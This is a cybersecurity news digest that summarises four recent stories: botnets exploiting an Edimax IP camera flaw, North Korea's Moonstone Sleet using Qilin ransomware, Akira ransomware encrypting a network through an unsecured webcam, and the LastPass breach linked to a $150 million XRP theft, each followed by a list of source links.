  • SOC Prime Blog: CVE-2025-27840: Vulnerability Exploitation in Espressif ESP32 Bluetooth Chips Can Lead to Unauthorized Access to Devices

Pierluigi Paganini@Security Affairs //
A critical command injection vulnerability, identified as CVE-2025-1316, impacting the Edimax IC-7100 IP camera is currently being exploited by botnet malware to compromise devices. This flaw allows attackers to achieve remote command execution, potentially leading to denial-of-service. Mirai-based botnets are actively exploiting this zero-day vulnerability.

Unpatched Edimax IP cameras are now prime targets in ongoing botnet attacks. Security researchers at Akamai discovered the flaw and reported it to the U.S. Cybersecurity & Infrastructure Agency (CISA), who attempted to contact the Taiwanese vendor. Users are strongly advised to apply any available patches to prevent their devices from being compromised and enlisted into these botnets.

Recommended read:
References :
  • securityaffairs.com: US CISA warns that multiple botnets are exploiting a recently disclosed vulnerability, tracked as CVE-2025-1316 (CVSS score of 9.8), in Edimax IC-7100 IP cameras.
  • www.bleepingcomputer.com: A critical command injection vulnerability impacting the Edimax IC-7100 IP camera is currently being exploited by botnet malware to compromise devices.
  • bsky.app: A critical command injection vulnerability impacting the Edimax IC-7100 IP camera is currently being exploited by botnet malware to compromise devices.
  • bsky.app: A critical command injection vulnerability impacting the Edimax IC-7100 IP camera is currently being exploited by botnet malware to compromise devices.
  • securityonline.info: CISA Warns of Critical Edimax IP Camera Flaw (CVE-2025-1316) with Public Exploits and No Vendor Fix
  • The DefendOps Diaries: Understanding and Mitigating the Edimax IP Camera Vulnerability
  • www.techradar.com: Edimax IC-7100 camera was found vulnerable to a command injection flaw currently being used in remote code execution attacks.
  • www.scworld.com: Edimax IP camera zero-day

Sergiu Gatlan@BleepingComputer //
Microsoft has identified a North Korean hacking group known as Moonstone Sleet, previously tracked as Storm-1789, deploying Qilin ransomware in limited attacks. This represents a shift for the group, as they have historically used custom-built ransomware. The adoption of Qilin ransomware signifies a move towards Ransomware-as-a-Service (RaaS), where they utilize ransomware developed by external operators rather than relying solely on their own tools.

Moonstone Sleet's move to RaaS marks a new era in cyber threats, primarily driven by financial motivations, a departure from previous espionage-focused operations. They have been observed demanding ransoms as high as $6.6 million in Bitcoin. The group has also been known to use creative tactics, including fake companies, trojanized software, and even a malicious game to infiltrate targets, showcasing their adaptability and resourcefulness.

Recommended read:
References :
  • gbhackers.com: North Korean Moonstone Sleet Uses Creative Tactics to Deploy Custom Ransomware
  • The DefendOps Diaries: Moonstone Sleet's Shift to Ransomware-as-a-Service: A New Era in Cyber Threats
  • BleepingComputer: Microsoft: North Korean hackers join Qilin ransomware gang
  • Cyber Security News: North Korean Moonstone Sleet Deploys Custom Ransomware with Creative Tactics
  • securityaffairs.com: Microsoft researchers reported that North Korea-linked APT tracked as Moonstone Sleet has employed the Qilin ransomware in limited attacks.
  • www.scworld.com: Moonstone Sleet was previously reported to have been behind a FakePenny ransomware attack.

Bill Toulas@BleepingComputer //
The Akira ransomware group has been observed employing a novel attack technique, weaponizing unsecured IoT devices to bypass traditional security measures. Cybersecurity researchers at S-RM discovered that Akira exploited a vulnerable webcam to circumvent Endpoint Detection and Response (EDR) systems and encrypt systems within a target’s network. This allowed the ransomware to mount Windows Server Message Block (SMB) network shares of other devices on the network.

Akira ransomware successfully encrypted network shares over SMB, effectively working around the EDR defenses. Attackers mounted writable network shares from the webcam’s environment, while EDR solutions often ignore SMB traffic from IoT devices. The attackers demonstrated how unsecured IoT devices can bypass enterprise-grade defenses, highlighting that perimeter defense alone is insufficient in modern network environments.

Recommended read:
References :
  • Cyber Security News: Akira Ransomware Exploits RDP to Attack Windows Servers
  • gbhackers.com: Akira Ransomware Targets Windows Servers via RDP and Evades EDR with Webcam Trick
  • www.bleepingcomputer.com: Akira ransomware encrypted network from a webcam to bypass EDR
  • The DefendOps Diaries: Akira Ransomware: Unsecured Webcams and IoT Vulnerabilities
  • Hidden Dragon ??: Akira ransomware group have been found using an unsecured webcam to launch their attack and encrypt their target’s entire network. Akira used the webcam to mount Windows Server Message Block (SMB) network shares of the company's other devices. Then, they encrypted the network shares over SMB, successfully working around EDR.
  • securityaffairs.com: The Akira ransomware gang exploited an unsecured webcam to bypass EDR and launch encryption attacks on a victim’s network. Cybersecurity researchers at S-RM team discovered a novel attack technique used by the Akira ransomware gang. The ransomware group used an unsecured webcam to encrypt systems within a target’s network, bypassing Endpoint Detection and Response (EDR). The
  • Hidden Dragon ??: Akira ransomware gang have been found using an unsecured webcam to launch their attack and encrypt their target’s entire network.
  • BleepingComputer: The Akira ransomware gang was spotted using an unsecured webcam to launch encryption attacks on a victim's network, effectively circumventing Endpoint Detection and Response (EDR), which was blocking the encryptor in Windows.
  • Anonymous ???????? :af:: ransomware gang was spotted using an unsecured webcam to launch encryption attacks on a victim's network, effectively circumventing Endpoint Detection and Response (EDR), which was blocking the encryptor in Windows.
  • DataBreaches.Net: The Akira ransomware gang exploited an unsecured webcam to bypass EDR and launch encryption attacks on a victim’s network.
  • Vulnerability-Lookup: Akira ransomware group have been found using an unsecured webcam to launch their attack and encrypt their target’s entire network
  • BleepingComputer: Ransomware gang encrypted network from a webcam to bypass EDR
  • Secure Bulletin: Akira ransomware’s ingenious IoT gambit: when webcams become cyberweapons
  • www.techradar.com: Security researchers explain how a company with EDR ended up hacked and its infrastructure encrypted.
  • Blog: Say cheese! Akira compromises victim via unsecured webcam
  • Risky Business: Risky Business #783 -- Evil webcam ransomwares entire Windows network

Thomas Brewster,@Thomas Fox-Brewster //
Federal investigators have linked the 2022 LastPass data breach to a $150 million cryptocurrency theft from a Ripple XRP wallet in January 2024. Authorities believe the hackers exploited stolen master passwords to gain unauthorized access to the wallet. The stolen XRP, initially valued at $150 million, is now worth an estimated $716 million due to fluctuations in the cryptocurrency market.

U.S. law enforcement has seized over $23 million in cryptocurrency connected to the theft. The U.S. Secret Service and FBI are actively investigating the case and working to recover the remaining stolen funds. Security researchers had previously identified a pattern of similar crypto heists linked to the LastPass breach, suggesting a broader impact of the password manager vulnerability. The incident highlights the significant risks associated with compromised password management systems.

Recommended read:
References :
  • bsky.app: US authorities have seized over $23 million in cryptocurrency linked to the theft of $150 million from a Ripple crypto wallet in January 2024. Investigators believe hackers who breached LastPass in 2022 were behind the attack.
  • krebsonsecurity.com: KrebsOnSecurity published findings from security researchers who concluded that a series of six-figure cyberheists across dozens of victims resulted from thieves cracking master passwords stolen from the password manager service LastPass in 2022.
  • The DefendOps Diaries: The Seizure of $23 Million in Cryptocurrency: A Detailed Analysis of the Ripple Wallet Hack Linked to LastPass Breach
  • Thomas Fox-Brewster: The stolen XRP is now worth $716 million. The Secret Service is trying to claw it back from unknown hackers.
  • www.bleepingcomputer.com: U.S. authorities have seized over $23 million in cryptocurrency linked to the theft of $150 million from a Ripple crypto wallet in January 2024. Investigators believe hackers who breached LastPass in 2022 were behind the attack.
  • BrianKrebs: New, by me: Feds Link $150M Cyberheist to 2022 LastPass Hacks In September 2023, KrebsOnSecurity published findings from security researchers who concluded that a series of six-figure cyberheists across dozens of victims resulted from thieves cracking master passwords stolen from the password manager service LastPass in 2022. In a court filing this week, U.S. federal agents investigating a spectacular $150 million cryptocurrency heist said they had reached the same conclusion.
  • Metacurity: Hack of LastPass in 2022 led to massive theft of XRP, now worth nearly $700 million
  • securityaffairs.com: US authorities seized $23M in crypto linked to a $150M Ripple hack, suspected to have been carried out by hackers from the 2022 LastPass breach.
  • www.scworld.com: LastPass hack leveraged to facilitate $150M crypto heist